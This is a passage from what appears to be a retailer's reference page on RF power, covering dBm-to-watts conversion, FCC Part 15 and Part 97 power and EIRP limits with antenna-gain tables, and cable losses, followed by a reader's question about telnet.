10    10 mW      26    398 mW     42    16 W
11    13 mW      27    500 mW     43    20 W
12    16 mW      28    630 mW     44    25 W
13    20 mW      29    800 mW     45    32 W
14    25 mW      30    1.0 W      46    40 W
15    32 mW      31    1.3 W      47    50 W

(Power in mW = 10^(dBm/10); the table rounds to two significant figures.)

Usage and Maximum Power Limit Guidelines in the US under FCC regulations

Before we can go on, we first need to separate the two different classes of users of spread spectrum devices and set out some of the specs that apply to each.

Consumers and IT Professionals Operating Spread Spectrum (DSSS) gear:

Users operate under FCC Part 15 rules and regulations.

Frequencies include 902-928 MHz, 2400-2483.5 MHz and 5725-5850 MHz.

Maximum Transmitter Power Output (TPO) is 1.0 watt or 30 dBm.

The formula for converting antenna gain from dBi to dBd is dBi - 2.15 = dBd (a half-wave dipole has 2.15 dBi of gain; it is often rounded to 2.2).

There are two different classifications for operation. You’ll commonly hear these modes referred to as Point to Point (PTP) and Point to Multipoint (PTMP). PTP is when two sites talk only to each other. PTMP is when many sites talk to a single core site. Each of these modes has different EIRP (Effective Isotropic Radiated Power) limitations.

Point to MultiPoint:

The maximum EIRP power allowed is 36dBm (4 watts).

Maximum transmitter power versus largest antenna table for PTMP:

Transmitter   RF power   Antenna Gain   EIRP in watts
30dBm         1W         6dBi           3.98
27dBm         500mW      9dBi           3.98
24dBm         250mW      12dBi          3.98
20dBm         100mW      15dBi          3.16
17dBm         50mW       18dBi          3.16
14dBm         25mW       21dBi          3.16
10dBm         10mW       24dBi          2.51

(The last four rows use convenient round milliwatt values a little below the limit, so their EIRP lands under 4 W; the 36 dBm cap itself would allow 21, 18, 15 and 12 dBm with those antennas. Every 1 dB of antenna gain above 6 dBi costs 1 dB of transmitter power in this mode.)

Losses between the transmitter and the antenna (cabling, lightning suppression, filtering) can be subtracted from the transmitter power figure in dBm. An example: a 30 dBm (1 watt) amplifier feeding 100 ft of LMR400 (6.7 dB of loss) brings the power at the antenna down to 23.3 dBm, which allows a 12 dBi antenna under the 36 dBm PTMP limit.

Point to Point:

Higher EIRP is allowed if the antennas are directional in nature.

Systems operating in a point-to-point configuration may employ transmitting antennas with directional gain greater than 6 dBi, provided the maximum output power of the transmitter is reduced by 1 dB for every 3 dB that the directional gain of the antenna exceeds 6 dBi.

Maximum transmitter power versus largest antenna table for PTP:

Transmitter   RF power   Antenna Gain   EIRP in watts
30dBm         1W         6dBi           3.98
29dBm         800mW      9dBi           6.35
28dBm         630mW      12dBi          10.14
27dBm         500mW      15dBi          15.81
26dBm         398mW      18dBi          25.23
25dBm         316mW      21dBi          40.28
24dBm         250mW      24dBi          62.79
23dBm         200mW      27dBi          100.2

This information is provided as a guideline. If you are not a professional installer we highly recommend that you read the FCC Part 15 rules and understand them before attempting installations.

Amateur Radio Operators operating under licensed spectrum:

Users operate under FCC Part 97 rules and regulations.

Frequencies usable with over-the-counter consumer gear include the 33 cm 902-928 MHz band, the 13 cm 2390-2450 MHz band and the 5 cm 5650-5925 MHz band.

In the 13cm band, 802.11b/g channels 1 thru 6 are the only channels in the 2390-2450 MHz bandplan.

Maximum Transmitter Power Output (TPO) is 100 watts or 50 dBm.

You must enable broadcasting of your SSID, which has to include your callsign.

Encryption is not currently permitted.

Only authorized licensed operators should be able to access Part 97 installed hardware, so care should be taken to prevent unauthorized users from utilizing said hardware.

Percentage of lost or gained signal per dB

dB Change   % Change   (table body not preserved in this copy; % change = (10^(dB/10) - 1) x 100)
This table is designed to help you visualize what a change in dB signal level does in an RF system. The dB change listed above can be reflected as either loss between the radio/transmitter and the antenna, or gain in amplification and antenna. Let's break these two down:

System Gains

* Every 1 dB of gain raises your output power by about 26%, and 3 dB doubles it.
* Antenna gain is a function of size, no matter what design it is. A small antenna that claims unreasonably high gain will not perform as you expect it to. All of the antennas we stock have been tested on an Anritsu antenna analyzer to verify the manufacturer's rating.

System Losses

* Every 1 dB of loss in the system removes about 21% of your power. Just as with gain, 3 dB of loss is a loss of 50% of your power.
* LMR400 loses about 6.6 dB per 100 ft at 2.4 GHz, so keep your runs as short as possible.
* All losses are cumulative, so every element of your system has to be accounted for: pigtails, coax runs, lightning protectors, etc. all have to be added up to get the full view of overall loss.

As you can see, even the smallest change makes a radical difference.

  2. Raktim Shrestha says:

    Can anyone tell me what is telnet? and how to telnet wifi service?
